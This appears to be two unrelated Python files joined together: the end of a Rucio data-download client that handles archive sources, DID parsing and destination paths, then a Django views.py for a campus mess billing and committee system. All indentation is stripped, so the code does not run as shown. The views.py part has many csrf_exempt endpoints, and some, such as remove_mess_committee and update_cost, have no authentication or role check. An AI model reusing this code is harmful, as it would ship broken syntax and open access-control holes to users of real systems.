# parent_dids contains all parents, so we take the intersection with the input dids
dataset_did_strs = file_item.setdefault('parent_dids', set())
dataset_did_strs.intersection_update(all_input_dids)
file_did_str = file_item['did']
file_did_scope, file_did_name = self._split_did_str(file_did_str)
file_item['scope'] = file_did_scope
file_item['name'] = file_did_name
logger.debug('Queueing file: %s' % file_did_str)
logger.debug('real parents: %s' % dataset_did_strs)
logger.debug('options: %s' % did_to_options)
# prepare destinations:
# if datasets were given: prepare the destination paths for each dataset
options = None
dest_file_paths = file_item.get('dest_file_paths', set())
for dataset_did_str in dataset_did_strs:
options = did_to_options.get(dataset_did_str)
if not options:
logger.error('No input options available for %s' % dataset_did_str)
continue
destinations = options['destinations']
dataset_scope, dataset_name = self._split_did_str(dataset_did_str)
paths = [os.path.join(self._prepare_dest_dir(dest[0], dataset_name, file_did_name, dest[1]), file_did_name) for dest in destinations]
if any(path in all_dest_file_paths for path in paths):
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.update(paths)
dest_file_paths.update(paths)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', dataset_scope)
file_item.setdefault('dataset_name', dataset_name)
# if no datasets were given only prepare the given destination paths
if len(dataset_did_strs) == 0:
options = did_to_options.get(file_did_str)
if not options:
logger.error('No input options available for %s' % file_did_str)
continue
destinations = options['destinations']
paths = [os.path.join(self._prepare_dest_dir(dest[0], file_did_scope, file_did_name, dest[1]), file_did_name) for dest in destinations]
if any(path in all_dest_file_paths for path in paths):
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.update(paths)
dest_file_paths.update(paths)
if options is None:
continue
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
# the file did str ist not an unique key for this dict because multiple calls of list_replicas
# could result in the same DID multiple times. So we're using the id of the dictionary objects
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
# workaround since we dont have the archive DID use the part behind the last slash of the PFN
# this doesn't respect the scope of the archive DID!!!
# and we trust that client_extract==True sources dont have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger.debug('client_extract=True; ignoring source: %s' % source['pfn'])
logger.debug('Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger.debug('Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger.debug('Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger.debug('Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger.debug('Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
# dont move from mixed list to pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in all_file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger.debug('Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger.debug('Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
# if all files of this archive are available in more than one archive the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger.debug('Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in all_file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, cea_id, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
'merged_options': {'ignore_checksum': True}, # we currently dont have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
:param did_str: the DID string that will be splitted
:returns: the scope- and name part of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
raise InputValidationError('%s is not a valid DID. To many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
def _prepare_dest_dir(self, base_dir, dest_dir_name, file_name, no_subdir):
"""
Builds the final destination path for a file and:
1. deletes existing files if no_subdir was given
2. creates the destination directory if it's not existent
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param file_name: name of the file that will be downloaded
:param no_subdir: if no subdirectory should be created
:returns: the absolut path of the destination directory
"""
dest_dir_path = os.path.abspath(base_dir)
# if no subdirectory is used, existing files will be overwritten
if no_subdir:
dest_file_path = os.path.join(dest_dir_path, file_name)
if os.path.isfile(dest_file_path):
self.logger.debug('Deleting existing file: %s' % dest_file_path)
os.remove(dest_file_path)
else:
dest_dir_path = os.path.join(dest_dir_path, dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
def _check_output(self, output_items):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if num_successful == 0:
raise NoFilesDownloaded()
elif num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
"""
Checks if sending trace is allowed and send the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.host, self.client.user_agent)
|
views.py | from datetime import date, datetime, timedelta
from django.contrib.auth.decorators import login_required
from django.db import transaction
from threading import Thread
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from django.contrib import messages
from django.views.generic import View
from django.db.models import Count
from django.forms.models import model_to_dict
from django.db.models import Q
from django.contrib.auth.models import User
from .utils import render_to_pdf
from applications.academic_information.models import Student
from applications.globals.models import ExtraInfo, HoldsDesignation, Designation
from .forms import MinuteForm
from .models import (Feedback, Menu, Menu_change_request, Mess_meeting,
Mess_minutes, Mess_reg, Messinfo, Monthly_bill,
Nonveg_data, Nonveg_menu, Payments, Rebate,
Special_request, Vacation_food, MessBillBase)
from .handlers import (add_nonveg_order, add_mess_feedback, add_vacation_food_request,
add_menu_change_request, handle_menu_change_response, handle_vacation_food_request,
add_mess_registration_time, add_leave_request, add_mess_meeting_invitation,
handle_rebate_response, add_special_food_request,
handle_special_request, add_bill_base_amount, add_mess_committee, generate_bill)
from notification.views import central_mess_notif
today_g = datetime.today()
month_g = today_g.month
month_g_l = today_g.strftime('%B')
year_g = today_g.year
tomorrow_g = today_g + timedelta(days=1)
first_day_of_this_month = date.today().replace(day=1)
first_day_of_next_month = (date.today().replace(day=28) + timedelta(days=4)).replace(day=1)
last_day_of_this_month = first_day_of_next_month - timedelta(days=1)
next_month = first_day_of_next_month.month
last_day_prev_month = first_day_of_this_month - timedelta(days=1)
month_last_g = last_day_prev_month.month
year_last_g = last_day_prev_month.year
previous_month = last_day_prev_month.strftime('%B')
def mess(request):
user = request.user
extrainfo = ExtraInfo.objects.get(user=user)
current_date = date.today()
holds_designations = HoldsDesignation.objects.filter(user=user)
desig = holds_designations
print(desig)
form = MinuteForm()
mess_reg = Mess_reg.objects.last()
count1 = 0
count2 = 0
count3 = 0
count4 = 0
count5 = 0
count6 = 0
count7 = 0
count8 = 0
if extrainfo.user_type == 'student':
student = Student.objects.get(id=extrainfo)
vaca_obj = Vacation_food.objects.filter(student_id=student)
feedback_obj = Feedback.objects.filter(student_id=student).order_by('-fdate')
data = Nonveg_data.objects.filter(student_id=student).order_by('-app_date')
monthly_bill = Monthly_bill.objects.filter(student_id=student)
payments = Payments.objects.filter(student_id=student)
rebates = Rebate.objects.filter(student_id=student).order_by('-app_date')
splrequest = Special_request.objects.filter(student_id=student).order_by('-app_date')
mess_optn = Messinfo.objects.get(student_id=student)
print(student)
print(33333333333333333333333333333333333)
if student.programme == 'B.Tech' or student.programme == 'B.Des':
programme = 1
else:
programme = 0
# newmenu = Menu_change_request.objects.all()
# meeting = Mess_meeting.objects.all()
# minutes = Mess_minutes.objects.all()
# feed = Feedback.objects.all()
# sprequest = Special_request.objects.filter(status='1')
count = 0
#variable y stores the menu items
y = Menu.objects.filter(mess_option=mess_optn.mess_option)
x = Nonveg_menu.objects.all()
for item in rebates:
d1 = item.start_date
d2 = item.end_date
item.duration = abs((d2 - d1).days)+1
item.save()
# for items in rebates:
# if items.leave_type == 'casual' and (items.status == '1' or items.status == '2'):
# count += item.duration
bill = Monthly_bill.objects.filter(Q(student_id=student) & Q(month=month_g_l) & Q(year=year_g))
amount_c = MessBillBase.objects.latest('timestamp')
rebate_count = 0
nonveg_total_bill = 0
for z in data:
if z.order_date.month == month_g:
nonveg_total_bill = nonveg_total_bill + z.dish.price
else:
bill.nonveg_total_bill = 0
for r in rebates:
if r.status == '2':
if r.start_date.month == month_g:
if r.end_date.month == next_month:
rebate_count = rebate_count + abs((last_day_of_this_month - r.start_date).days) + 1
else:
rebate_count = rebate_count + abs((r.end_date - r.start_date).days) + 1
elif r.end_date.month == month_g:
rebate_count = rebate_count + abs((r.end_date - first_day_of_this_month).days) + 1
else:
rebate_count = 0
rebate_amount = rebate_count * amount_c.bill_amount / 30
total_bill = amount_c.bill_amount - rebate_amount + nonveg_total_bill
if bill:
bill.update(student_id = student,
month = month_g_l,
year = year_g,
amount = amount_c.bill_amount,
rebate_count = rebate_count,
rebate_amount = rebate_amount,
nonveg_total_bill=nonveg_total_bill,
total_bill = total_bill)
else:
bill_object = Monthly_bill(student_id=student,
amount=amount_c.bill_amount,
rebate_count=rebate_count,
rebate_amount=rebate_amount,
nonveg_total_bill=nonveg_total_bill,
total_bill=total_bill,
month=month_g_l,
year=year_g)
bill_object.save()
for d in desig:
if d.designation.name == 'mess_committee_mess1' or d.designation.name == 'mess_convener_mess1':
newmenu = Menu_change_request.objects.filter(dish__mess_option='mess1').order_by('-app_date')
# newmenu = Menu_change_request.objects.all()
meeting = Mess_meeting.objects.all()
minutes = Mess_minutes.objects.all()
feed = Feedback.objects.filter(mess='mess1').order_by('-fdate')
feed2 = Feedback.objects.filter(mess='mess2').order_by('-fdate')
sprequest = Special_request.objects.filter(status='1').order_by('-app_date')
sprequest_past = Special_request.objects.filter(status='2').order_by('-app_date')
# count1 = feed.filter(Q(feedback_type='Maintenance') & Q(mess='mess1')).count()
for f in feed:
if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess1':
count1 += 1
elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess1':
count2 += 1
elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess1':
count3 += 1
elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess1':
count4 += 1
for f in feed2:
if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess2':
count5 += 1
elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess2':
count6 += 1
elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess2':
count7 += 1
elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess2':
count8 += 1
context = {
'menu': y,
'messinfo': mess_optn,
'newmenu': newmenu,
'monthly_bill': monthly_bill,
'payments': payments,
'nonveg': x,
'vaca': vaca_obj,
'info': extrainfo,
'feedback': feedback_obj,
'feed': feed,
'student': student,
'data': data,
'mess_reg': mess_reg,
'current_date': current_date,
'count': count,
'rebates': rebates,
'meeting': meeting,
'minutes': minutes,
'sprequest': sprequest,
'splrequest': splrequest,
'sprequest_past': sprequest_past,
'programme':programme,
'count1': count1,
'count2': count2,
'count3': count3,
'count4': count4,
'count5': count5,
'count6': count6,
'count7': count7,
'count8': count8,
'form': form,
'desig': desig
}
return render(request, "messModule/mess.html", context)
if d.designation.name == 'mess_committee_mess2' or d.designation.name == 'mess_convener_mess2':
# newmenu = Menu_change_request.objects.all()
newmenu = Menu_change_request.objects.filter(dish__mess_option='mess2').order_by('-app_date')
meeting = Mess_meeting.objects.all()
minutes = Mess_minutes.objects.all()
feed = Feedback.objects.filter(mess='mess2').order_by('-fdate')
feed2 = Feedback.objects.filter(mess='mess1').order_by('-fdate')
sprequest = Special_request.objects.filter(status='1').order_by('-app_date')
sprequest_past = Special_request.objects.filter(status='2').order_by('-app_date')
# count5 = feed.filter(Q(feedback_type='Maintenance') & Q(mess='mess2')).count()
for f in feed2:
if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess1':
count1 += 1
elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess1':
count2 += 1
elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess1':
count3 += 1
elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess1':
count4 += 1
for f in feed:
if f.feedback_type == 'Maintenance' and mess_optn.mess_option == 'mess2':
count5 += 1
elif f.feedback_type == 'Food' and mess_optn.mess_option == 'mess2':
count6 += 1
elif f.feedback_type == 'Cleanliness' and mess_optn.mess_option == 'mess2':
count7 += 1
elif f.feedback_type == 'Others' and mess_optn.mess_option == 'mess2':
count8 += 1
context = {
'menu': y,
'messinfo': mess_optn,
'newmenu': newmenu,
'monthly_bill': monthly_bill,
'payments': payments,
'nonveg': x,
'vaca': vaca_obj,
'info': extrainfo,
'feedback': feedback_obj,
'feed': feed,
'student': student,
'data': data,
'mess_reg': mess_reg,
'current_date': current_date,
'count': count,
'rebates': rebates,
'programme': programme,
'meeting': meeting,
'minutes': minutes,
'sprequest': sprequest,
'splrequest': splrequest,
'sprequest_past': sprequest_past,
'count1': count1,
'count2': count2,
'count3': count3,
'count4': count4,
'count5': count5,
'count6': count6,
'count7': count7,
'count8': count8,
'form': form,
'desig': desig
}
return render(request, "messModule/mess.html", context)
context = {
'menu': y,
'messinfo': mess_optn,
'monthly_bill': monthly_bill,
'payments': payments,
'nonveg': x,
'vaca': vaca_obj,
'info': extrainfo,
'feedback': feedback_obj,
'student': student,
'data': data,
'mess_reg': mess_reg,
'current_date': current_date,
'count': count,
'rebates': rebates,
'splrequest': splrequest,
'form': form,
'programme': programme,
'desig': desig
}
return render(request, "messModule/mess.html", context)
elif extrainfo.user_type == 'staff':
current_bill = MessBillBase.objects.latest('timestamp')
nonveg_orders_today = Nonveg_data.objects.filter(order_date=today_g)\
.values('dish__dish','order_interval').annotate(total=Count('dish'))
nonveg_orders_tomorrow = Nonveg_data.objects.filter(order_date=tomorrow_g)\
.values('dish__dish','order_interval').annotate(total=Count('dish'))
# make info with diff name and then pass context
newmenu = Menu_change_request.objects.all().order_by('-app_date')
vaca_all = Vacation_food.objects.all().order_by('-app_date')
# members_mess = HoldsDesignation.objects.filter(designation__name='mess_convener')
members_mess = HoldsDesignation.objects.filter(Q(designation__name__contains='mess_convener')
| Q(designation__name__contains='mess_committee'))
print(members_mess)
y = Menu.objects.all()
x = Nonveg_menu.objects.all()
leave = Rebate.objects.filter(status='1').order_by('-app_date')
leave_past = Rebate.objects.filter(status='2').order_by('-app_date')
context = {
'bill_base': current_bill,
'today': today_g.date(),
'tomorrow': tomorrow_g.date(),
'nonveg_orders_t':nonveg_orders_tomorrow,
'nonveg_orders': nonveg_orders_today,
'members': members_mess,
'menu': y,
'newmenu': newmenu,
'vaca_all': vaca_all,
'info': extrainfo,
'leave': leave,
'leave_past': leave_past,
'current_date': current_date,
'mess_reg': mess_reg,
'desig': desig,
}
return render(request, "messModule/mess.html", context)
elif extrainfo.user_type == 'faculty':
meeting = Mess_meeting.objects.all()
minutes = Mess_minutes.objects.all()
feed = Feedback.objects.all().order_by('-fdate')
y = Menu.objects.all()
for f in feed:
mess_opt = Messinfo.objects.get(student_id=f.student_id)
if f.feedback_type == 'Maintenance' and mess_opt.mess_option == 'mess1':
count1 += 1
elif f.feedback_type == 'Food' and mess_opt.mess_option == 'mess1':
count2 += 1
elif f.feedback_type == 'Cleanliness' and mess_opt.mess_option == 'mess1':
count3 += 1
elif f.feedback_type == 'Others' and mess_opt.mess_option == 'mess1':
count4 += 1
for f in feed:
mess_opt = Messinfo.objects.get(student_id=f.student_id)
if f.feedback_type == 'Maintenance' and mess_opt.mess_option == 'mess2':
count5 += 1
elif f.feedback_type == 'Food' and mess_opt.mess_option == 'mess2':
count6 += 1
elif f.feedback_type == 'Cleanliness' and mess_opt.mess_option == 'mess2':
count7 += 1
elif f.feedback_type == 'Others' and mess_opt.mess_option == 'mess2':
count8 += 1
context = {
'info': extrainfo,
'menu': y,
'meeting': meeting,
'minutes': minutes,
'count1': count1,
'count2': count2, 'count3': count3, 'feed': feed,
'count4': count4, 'form': form, 'count5': count5,
'count6': count6, 'count7': count7, 'count8': count8, 'desig': desig
}
return render(request, 'messModule/mess.html', context)
@login_required
@transaction.atomic
@csrf_exempt
def place_order(request):
"""
This function is to place non-veg food orders
:param request:
user: Current user
order_interval: Time of the day for which order is placed eg breakfast/lunch/dinner
:variables:
extra_info: Extra information about the current user. From model ExtraInfo
student: Student information about the current user
student_mess: Mess choices of the student
dish_request: Predefined dish available
:return:
"""
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
if extra_info.user_type == 'student':
student = Student.objects.get(id=extra_info)
student_mess = Messinfo.objects.get(student_id=student)
add_nonveg_order(request, student)
return HttpResponseRedirect('/mess')
@csrf_exempt
@login_required
@transaction.atomic
def submit_mess_feedback(request):
"""
This function is to record the feedback submitted
:param request:
user: Current logged in user
:variable:
extra_info: Extra information of the user
:return:
data: to record success or any errors
"""
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
student = Student.objects.get(id=extra_info)
if extra_info.user_type == 'student':
data = add_mess_feedback(request, student)
central_mess_notif(request.user, request.user, 'feedback_submitted')
return JsonResponse(data)
@csrf_exempt
@login_required
@transaction.atomic
def mess_vacation_submit(request):
"""
This function is to record vacation food requests
:param request:
user: Current user information
:variables:
:return:
data: JsonResponse
"""
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
student = Student.objects.get(id=extra_info)
if extra_info.user_type == 'student':
data = add_vacation_food_request(request, student)
return JsonResponse(data)
@login_required
@transaction.atomic
def submit_mess_menu(request):
"""
This function is to record mess menu change requests by the mess_committee
:param request:
user:Current user
:return:
"""
# TODO add ajax for this
user = request.user
holds_designations = HoldsDesignation.objects.filter(user=user)
extrainfo = ExtraInfo.objects.get(user=user)
designation = holds_designations
student = Student.objects.get(id=extrainfo)
# globallyChange()
context = {}
# A user may hold multiple designations
data = add_menu_change_request(request,student)
if data['status'] == 1:
return HttpResponseRedirect("/mess")
return render(request, 'messModule/mess.html', context)
@login_required
def menu_change_response(request):
"""
This function is to respond to mess menu requests
:param request:
user: Current user
:return:
"""
user = request.user
holds_designations = HoldsDesignation.objects.filter(user=user)
designation = holds_designations
data = handle_menu_change_response(request)
return JsonResponse(data)
@login_required
def response_vacation_food(request, ap_id):
"""
This function records the response to vacation food requests
:param request:
user: Current user
:param ap_id:
:variables:
holds_designations: Designation of the current user
:return:
"""
user = request.user
# extra_info = ExtraInfo.objects.get(user=user)
holds_designations = HoldsDesignation.objects.filter(user=user)
designation = holds_designations
for d in designation:
if d.designation.name == 'mess_manager':
data = handle_vacation_food_request(request, ap_id)
return HttpResponseRedirect("/mess")
@login_required
@transaction.atomic
def regsubmit(request):
i = 0
j = 0
month_1 = ['January', 'February', 'March', 'April', 'May', 'June']
month_2 = ['July', 'August', 'September', 'October', 'November', 'December']
user = request.user
extrainfo = ExtraInfo.objects.get(user=user)
if extrainfo.user_type == 'student':
student = Student.objects.get(id=extrainfo)
mess = request.POST.get('mess_type')
mess_info_inst = Messinfo.objects.get(student_id=student)
mess_info_inst.mess_option = mess
mess_info_inst.save()
mess_reg = Mess_reg.objects.last()
if Monthly_bill.objects.filter(student_id=student):
return HttpResponseRedirect("/mess")
else:
if mess_reg.end_reg.strftime("%B") in month_1:
while i<=5:
monthly_bill_obj = Monthly_bill(student_id=student, month=month_1[i], year=year_last_g)
monthly_bill_obj.save()
i = i+1
else:
while j<=5:
monthly_bill_obj = Monthly_bill(student_id=student, month=month_2[j], year=year_last_g)
monthly_bill_obj.save()
j = j+1
return HttpResponseRedirect("/mess")
else:
return redirect('mess')
@login_required
@transaction.atomic
def start_mess_registration(request):
"""
This function is to start mess registration
@request:
user: Current user
designation: designation of current user to validate proper platform
"""
# TODO ajax convert add a section to see previous sessions as well as close a session
user = request.user
designation = HoldsDesignation.objects.filter(user=user)
for d in designation:
if d.designation.name == 'mess_manager':
data = add_mess_registration_time(request)
return JsonResponse(data)
@transaction.atomic
@csrf_exempt
def mess_leave_request(request):
"""
This function is to record and validate leave requests
@request:
user: Current user
@variables:
student: Information od student submitting the request
"""
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
student = Student.objects.get(id=extra_info)
data = add_leave_request(request, student)
return JsonResponse(data)
@login_required
@transaction.atomic
def minutes(request):
"""
To upload the minutes of the meeting
:param request:
:return:
"""
if request.method == 'POST' and request.FILES:
form = MinuteForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return HttpResponseRedirect('/mess')
else:
return HttpResponseRedirect('/mess')
@csrf_exempt
@transaction.atomic
def invitation(request):
"""
This function is to schedule a mess committee meeting
@request:
@variables:
"""
# todo add ajax to this page as well
data = add_mess_meeting_invitation(request)
# return HttpResponseRedirect("/mess")
return JsonResponse(data)
@login_required
@transaction.atomic
@csrf_exempt
def rebate_response(request):
"""
This function is to respond to rebate requests
:param request: user: Current user
@variables: designation : designation of the user
@return:
data: returns the status of the application
"""
data = {
'status': 1
}
user = request.user
designation = HoldsDesignation.objects.filter(user=user)
for d in designation:
if d.designation.name == 'mess_manager':
data = handle_rebate_response(request)
return JsonResponse(data)
@login_required
@transaction.atomic
@csrf_exempt
def place_request(request):
# This is for placing special food request
"""
This function is to place special food requests ( used by students )
@variables:
user: Current user
@return:
data['status']: returns status of the application
"""
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
if extra_info.user_type == 'student':
extra_info = ExtraInfo.objects.get(user=user)
student = Student.objects.get(id=extra_info)
data = add_special_food_request(request, student)
return JsonResponse(data)
@login_required
@transaction.atomic
@csrf_exempt
def special_request_response(request):
"""
This function is to respond to special request for food submitted by students
data: message regarding the request
"""
data = handle_special_request(request)
return JsonResponse(data)
@login_required
@transaction.atomic
@csrf_exempt
def update_cost(request):
"""
This function is to update the base cost of the monthly central mess bill
:param request:
:return:
"""
user = request.user
# extrainfo = ExtraInfo.objects.get(user=user)
data = add_bill_base_amount(request)
return JsonResponse(data)
def generate_mess_bill(request):
"""
This function is to generate the bill of the students
@variables:
user: stores current user information
nonveg_data : stores records of non-veg ordered by a student
year_now: current year
month_now: current month
amount_m: monhly base amount
students: information of all students
mess_info: Mess Information, mainly choice of mess
rebates: Rebate records of students
"""
# todo generate proper logic for generate_mess_bill
user = request.user
t1 = Thread(target=generate_bill, args=())
t1.setDaemon(True)
t1.start()
# int = generate_bill()
data ={
'status': 1
}
return JsonResponse(data)
class MenuPDF(View):
def post(self, request, *args, **kwargs):
user = request.user
extra_info = ExtraInfo.objects.get(user=user)
y = Menu.objects.all()
if extra_info.user_type=='student':
student = Student.objects.get(id=extra_info)
mess_info = Messinfo.objects.get(student_id=student)
mess_option = mess_info.mess_option
context = {
'menu': y,
'mess_option': mess_option
}
if mess_option=='mess2':
return render_to_pdf('messModule/menudownloadable2.html', context)
else:
return render_to_pdf('messModule/menudownloadable1.html', context)
else:
context = {
'menu': y,
'mess_option': 'mess2'
}
return render_to_pdf('messModule/menudownloadable2.html', context)
# return HttpResponse(pdf, content_type='application/pdf')
class MenuPDF1(View):
# This function is to generate the menu in pdf format (downloadable) for mess 1
def post(self, request, *args, **kwargs):
user = request.user
# extrainfo = ExtraInfo.objects.get(user=user)
y = Menu.objects.all()
context = {
'menu': y,
'mess_option': 'mess1'
}
return render_to_pdf('messModule/menudownloadable1.html', context)
def menu_change_request(request):
newmenu = Menu_change_request.objects.filter(status=2)
data = model_to_dict(newmenu)
return JsonResponse(data)
def submit_mess_committee(request):
roll_number = request.POST['rollnumber']
data = add_mess_committee(request, roll_number)
return JsonResponse(data)
def remove_mess_committee(request):
member_id = request.POST['member_id']
data_m = member_id.split("-")
roll_number = data_m[1]
print(member_id)
print(data_m)
print(roll_number)
if data_m[0] == 'mess_committee_mess1':
designation = Designation.objects.get(name='mess_committee_mess1')
elif data_m[0] == 'mess_convener_mess1':
designation = Designation.objects.get(name='mess_convener_mess1')
elif data_m[0] == 'mess_committee_mess2':
designation = Designation.objects.get(name='mess_committee_mess2')
else:
designation = Designation.objects.get(name='mess_convener_mess2')
remove_object = HoldsDesignation.objects.get(Q(user__username=roll_number) & Q(designation=designation))
print(remove_object)
remove_object.delete()
data = {
'status': 1,
'message': 'Successfully removed '
}
return JsonResponse(data)
def get_leave_data(request):
leave_data = Rebate.objects.filter(Q(start_date__lte=today_g)&Q(end_date__gte=today_g)).count()
leave_data_t = Rebate.objects.filter(Q(start_date__lte=tomorrow_g)&Q(end_date__gte=tomorrow_g)).count()
data = {
'status': 1,
'message': 'HI I AM WORKING',
'today': today_g.date(),
'tomorrow': tomorrow_g.date(),
'counttoday': leave_data,
'counttomorrow':leave_data_t
}
return JsonResponse(data)
def accept_vacation_leaves(request):
start_date_leave = request.GET['start_date']
end_date_leave = request.GET['end_date']
leave_data = Rebate.objects.filter(Q(start_date__gte=start_date_leave)
&Q(end_date__lte=end_date_leave)
&Q(leave_type="vacation")
